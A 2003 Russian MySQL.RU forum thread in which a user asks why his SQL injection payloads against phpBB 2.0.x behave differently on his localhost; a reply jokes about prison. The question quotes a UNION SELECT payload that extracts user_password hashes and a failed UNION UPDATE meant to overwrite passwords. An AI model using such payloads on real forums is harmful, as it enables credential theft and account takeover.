|
MySQL.RU - Webboard
 Вернуться
 SQL иньекция в в phpBB 2.0.х (Terabyte) 06/12/2003 - 18:26:08
 Re: SQL иньекция в в phpBB 2.0.х (walrus) 07/12/2003 - 17:21:15
Re: SQL иньекция в в phpBB 2.0.х (Andy Zubov) 10/12/2003 - 12:47:47
> Original message text:
> From: Terabyte - 06/12/2003 - 18:26:08
> Subject:SQL иньекция в в phpBB 2.0.х
> -----------------
> Вопрос будет по уязвимости - http://www.securitylab.ru/41501.html
>
> комманда:
> 1 union SELECT user_password FROM phpbb_users union SELECT search_array FROM phpbb_search_results WHERE search_id = 1
> проскакивает, а вот:
> 1 union update phpbb_users set user_password=1 union SELECT search_array FROM phpbb_search_results WHERE search_id = 1
>
> пишет странную ошибку:
> SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'update phpbb_users set user_password=qwe13/* AND sessio
>
> Тещу на локалхосте с мскулом 4,* где union должно работать. В чем дело?
>
From: Andy Zubov - 10/12/2003 - 12:47:47
Subject:SQL иньекция в в phpBB 2.0.х
-----------------
А самое что забавное, заметут и сделают из тебя козла отпущение с публичной поркой и впаиванием тебе срока. А в газетах тебя назовут супер-хакером! :)
PS: в каждой шутке есть доля шутки
[Это сообщение - спам!]
Последние сообщения из форума
Уважаемые посетители форума MySQL.RU!
Убедительная просьба, прежде чем задавать свой вопрос в этом форуме, обратите внимание на разделы:
- ответы на наиболее часто задаваемые вопросы - FAQ
- раздел документация
- раздел поиск по сообщениям форума и документации
Также, старайтесь наиболее подробно указывать свою ситуацию (версию операционной системы, версию MySQL,
версию программного обеспечения, по которому возникает вопрос, текст возникающих ошибок, и др.)
Помните, чем конкретнее Вы опишете ситуацию, тем больше шансов получить реальную помощь.
12137
|
|
